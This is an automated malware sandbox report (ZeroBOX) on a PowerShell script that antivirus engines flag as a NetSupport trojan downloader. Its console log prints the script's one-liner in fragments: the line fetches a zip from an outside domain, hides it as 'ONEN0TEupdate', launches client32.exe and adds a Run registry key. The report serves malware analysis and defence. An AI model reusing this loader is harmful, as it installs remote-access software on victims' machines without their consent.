Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 14, 2023, 9:22 a.m.	April 14, 2023, 9:24 a.m.

Size	512.0B
Type	ASCII text, with very long lines, with no line terminators
MD5	`9f797334ceca4dbf0f9fde8bad8cdc24`
SHA256	`b0471a55b4f76bdac67acf88eaaed2335198732afbbb5e37adec4c4346cc1edf`
CRC32	`A1BF1B38`
ssdeep	`12:l98IAroDki+UXQBBI5akqHXxtEhRALoepf1VVj0WkY3n:j8fNaXQBu5az3xtEnuLJ1VVGY3`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\sets.ps1
3008

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 105 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: The term 'Start-BitsTransfer' is not recognized as the name of a cmdlet, functi console_handle: 0x00000023	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: on, script file, or operable program. Check the spelling of the name, or if a p console_handle: 0x0000002f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ath was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\sets.ps1:1 char:148 console_handle: 0x00000047	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + cd $env:AppData; $link="https://eylulsifalitas.com/baot.zip"; $path=$env:APPD console_handle: 0x00000053	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ATA+"\tr.zip"; $pzip=$env:APPDATA+"\ONEN0TEupdate"; Start-BitsTransfer <<<< -S console_handle: 0x0000005f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ource $link -Destination $Path; expand-archive -path .\tr.zip -destinationpath console_handle: 0x0000006b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -pat console_handle: 0x00000077	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: h $path; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemPro console_handle: 0x00000083	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: perty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "ONEN0T console_handle: 0x0000008f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: Eupdate" -Value $fstr -PropertyType "String"; console_handle: 0x0000009b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Start-BitsTransfer:String) [], console_handle: 0x000000a7	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: CommandNotFoundException console_handle: 0x000000b3	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000bf	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: The term 'expand-archive' is not recognized as the name of a cmdlet, function, console_handle: 0x000000df	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x000000eb	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x000000f7	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\sets.ps1:1 char:197 console_handle: 0x00000103	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + cd $env:AppData; $link="https://eylulsifalitas.com/baot.zip"; $path=$env:APPD console_handle: 0x0000010f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ATA+"\tr.zip"; $pzip=$env:APPDATA+"\ONEN0TEupdate"; Start-BitsTransfer -Source console_handle: 0x0000011b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $link -Destination $Path; expand-archive <<<< -path .\tr.zip -destinationpath console_handle: 0x00000127	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -pat console_handle: 0x00000133	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: h $path; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemPro console_handle: 0x0000013f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: perty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "ONEN0T console_handle: 0x0000014b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: Eupdate" -Value $fstr -PropertyType "String"; console_handle: 0x00000157	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + CategoryInfo : ObjectNotFound: (expand-archive:String) [], Comm console_handle: 0x00000163	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: andNotFoundException console_handle: 0x0000016f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000017b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: Get-Item : Cannot find path 'C:\Users\test22\AppData\Roaming\ONEN0TEupdate' bec console_handle: 0x0000019b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ause it does not exist. console_handle: 0x000001a7	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\sets.ps1:1 char:251 console_handle: 0x000001b3	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + cd $env:AppData; $link="https://eylulsifalitas.com/baot.zip"; $path=$env:APPD console_handle: 0x000001bf	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ATA+"\tr.zip"; $pzip=$env:APPDATA+"\ONEN0TEupdate"; Start-BitsTransfer -Source console_handle: 0x000001cb	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $link -Destination $Path; expand-archive -path .\tr.zip -destinationpath $pzip; console_handle: 0x000001d7	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $FOLD=Get-Item <<<< $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -pat console_handle: 0x000001e3	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: h $path; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemPro console_handle: 0x000001ef	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: perty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "ONEN0T console_handle: 0x000001fb	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: Eupdate" -Value $fstr -PropertyType "String"; console_handle: 0x00000207	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...g\ONEN0TEupda console_handle: 0x00000213	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: te:String) [Get-Item], ItemNotFoundException console_handle: 0x0000021f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetIt console_handle: 0x0000022b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: emCommand console_handle: 0x00000237	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: Property 'attributes' cannot be found on this object; make sure it exists and i console_handle: 0x00000257	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: s settable. console_handle: 0x00000263	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\sets.ps1:1 char:272 console_handle: 0x0000026f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: + cd $env:AppData; $link="https://eylulsifalitas.com/baot.zip"; $path=$env:APPD console_handle: 0x0000027b	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: ATA+"\tr.zip"; $pzip=$env:APPDATA+"\ONEN0TEupdate"; Start-BitsTransfer -Source console_handle: 0x00000287	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $link -Destination $Path; expand-archive -path .\tr.zip -destinationpath $pzip; console_handle: 0x00000293	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: $FOLD=Get-Item $pzip -Force; $FOLD. <<<< attributes='Hidden'; Remove-Item -pat console_handle: 0x0000029f	1	1
WriteConsoleW April 14, 2023, 9:22 a.m.	buffer: h $path; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemPro console_handle: 0x000002ab	1	1

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 14, 2023, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x06021528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 14, 2023, 9:22 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (23 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06571000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06573000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05614000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06574000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05616000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05617000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05618000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05619000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2023, 9:22 a.m.	process_identifier: 3008 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

ESET-NOD32	PowerShell/TrojanDownloader.Agent.GTE
Tencent	Win32.Trojan-Downloader.Downloader.Yolw
Gridinsoft	Trojan.U.NetSupport.bot
Microsoft	TrojanDownloader:PowerShell/Obfuse.AJ!MTB
Google	Detected
Ikarus	Trojan-Downloader.PowerShell.Agent

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate

reg_value

C:\Users\test22\AppData\Roaming\ONEN0TEupdate\client32.exe

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

client32.exe

sets.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All